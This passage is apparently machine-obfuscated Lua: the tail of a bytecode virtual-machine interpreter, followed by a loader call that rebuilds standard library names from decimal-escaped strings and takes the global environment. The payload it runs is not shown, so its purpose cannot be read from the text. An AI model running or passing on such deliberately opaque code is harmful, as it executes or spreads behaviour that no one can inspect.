a<=(205-0x83)do l=-l l=(8648376)while(0x255b/(12445/0x5f))<a do l=-l local l;d[e[u]]=d[e[i]][e[p]];n=n+o;e=x[n];d[e[w]]=d[e[b]][e[N]];n=n+o;e=x[n];d[e[u]]=d[e[i]][e[g]];n=n+o;e=x[n];d[e[u]]=d[e[V]][e[P]];n=n+o;e=x[n];d[e[_]]=d[e[i]][e[p]];n=n+o;e=x[n];d[e[w]]=d[e[f]][e[S]];n=n+o;e=x[n];d[e[t]][e[v]]=e[m];n=n+o;e=x[n];d[e[_]]=j[e[s]];n=n+o;e=x[n];d[e[w]]=e[v];n=n+o;e=x[n];l=e[_]d[l](d[l+r])break end while 2706==(l)/((0x4ecec/(-112+0xd5)))do local l=e[u];local o=d[l]local a=d[l+2];if(a>0)then if(o>d[l+1])then n=e[v];else d[l+3]=o;end elseif(o<d[l+1])then n=e[V];else d[l+3]=o;end break end;break;end while(l)/((897-0x1e1))==983 do l=(11620976)while(0x1149/59)>=a do l=-l d[e[_]]=#d[e[V]];break;end while(l)/((0xb87a8/232))==3568 do l=(2953020)while a>(0xf0-164)do l=-l if(d[e[k]]==e[p])then n=n+r;else n=e[f];end;break end while 1106==(l)/((66750/0x19))do d[e[w]]=#d[e[V]];break end;break;end break;end break;end while 3334==(l)/((2732+-0x1a))do l=(9104080)while((0xc0f80/152)/0x41)>=a do l=-l l=(895024)while(12324/(0x6538/164))>=a do l=-l j[e[f]]=d[e[_]];break;end while(l)/((323128/0xef))==662 do l=(10130220)while a>(0xbc-109)do l=-l local l=e[_];local a=d[l+2];local o=d[l]+a;d[l]=o;if(a>0)then if(o<=d[l+1])then n=e[v];d[l+3]=o;end elseif(o>=d[l+1])then n=e[f];d[l+3]=o;end break end while(l)/(((256229-0x1f4a9)/0x26))==3006 do local e=e[h]d[e]=d[e](M(d,e+o,y))break end;break;end break;end while 3671==(l)/((5055-0xa0f))do l=(7680321)while(0xa3+-82)>=a do l=-l if(d[e[w]]~=e[m])then n=n+r;else n=e[s];end;break;end while(l)/((-0x67+2380))==3373 do l=(1114766)while a>(-38+0x78)do l=-l local e=e[_]d[e]=d[e](M(d,e+o,y))break end while(l)/(((-0x31+2143)-1096))==1117 do if(d[e[u]]~=e[N])then n=n+r;else n=e[f];end;break end;break;end break;end break;end break;end break;end break;end n=n+o;end;end);end;return W(B(),{},z())()end)_msec({[(0x2440/64)]='\115\116'..(function(e)return(e and'(-0x14+120)')or'\114\105'or'\120\58'end)((815/0xa3)==(0x4e6/(0x131+-96)))..'\110g',[(-49+0x339)]='\108\100'..(function(e)return(e and'(0xd9-117)')or'\101\120'or'\119\111'end)((0x5c+-87)==(116-(-69+0xb3)))..'\112',[(0x1dc-251)]=(function(e)return(e and'(0x10f-171)')and'\98\121'or'\100\120'end)((0x41+-60)==(-0x41+70))..'\116\101',[(422+(-0x2f4/28))]='\99'..(function(e)return(e and'(196+-0x60)')and'\90\19\157'or'\104\97'end)((-0x60+101)==(-0x48+75))..'\114',[(0x435-554)]='\116\97'..(function(e)return(e and'(0x132-206)')and'\64\113'or'\98\108'end)((0x31-43)==(0x7d+-120))..'\101',[(0x3f2-546)]=(function(e)return(e and'(0x85+-33)')or'\115\117'or'\78\107'end)((0x5e-91)==((-0x5c+256)-0x85))..'\98',[(171191/0xc1)]='\99\111'..(function(e)return(e and'(0xae+-74)')and'\110\99'or'\110\105\103\97'end)((0xb4-149)==(0x117/9))..'\97\116',[((0x30a80/144)-750)]=(function(e,l)return(e and'(0x32c8/130)')and'\48\159\158\188\10'or'\109\97'end)((-0x55+90)==(0x2ca/119))..'\116\104',[(4170/0x3)]=(function(e,l)return((-85+0x5a)==(0x46-(-66+0x85))and'\48'..'\195'or e..((not'\20\95\69'and'\90'..'\180'or l)))or'\199\203\95'end),[(0xf8ca/66)]='\105\110'..(function(e,l)return(e and'(-83+0xb7)')and'\90\115\138\115\15'or'\115\101'end)((0x49-68)==((-2350/0x19)+0x7d))..'\114\116',[((-0x3c+2162)-1061)]='\117\110'..(function(e,l)return(e and'(400/0x4)')or'\112\97'or'\20\38\154'end)((72+-0x43)==(0xae-143))..'\99\107',[(0xde00/(-0x32+98))]='\115\101'..(function(e)return(e and'(0x3c8c/155)')and'\110\112\99\104'or'\108\101'end)((49-0x2c)==((4536-0x900)/0x48))..'\99\116',[(2541-0x51a)]='\116\111\110'..(function(e,l)return(e and'(212+(-0x3480/120))')and'\117\109\98'or'\100\97\120\122'end)(((242-0x89)-100)==((176-0x8c)+-31))..'\101\114'},{[(15498/0xbd)]=((getfenv)or(function()return(_ENV)end))},((getfenv)or(function()return(_ENV)end))()) end)()


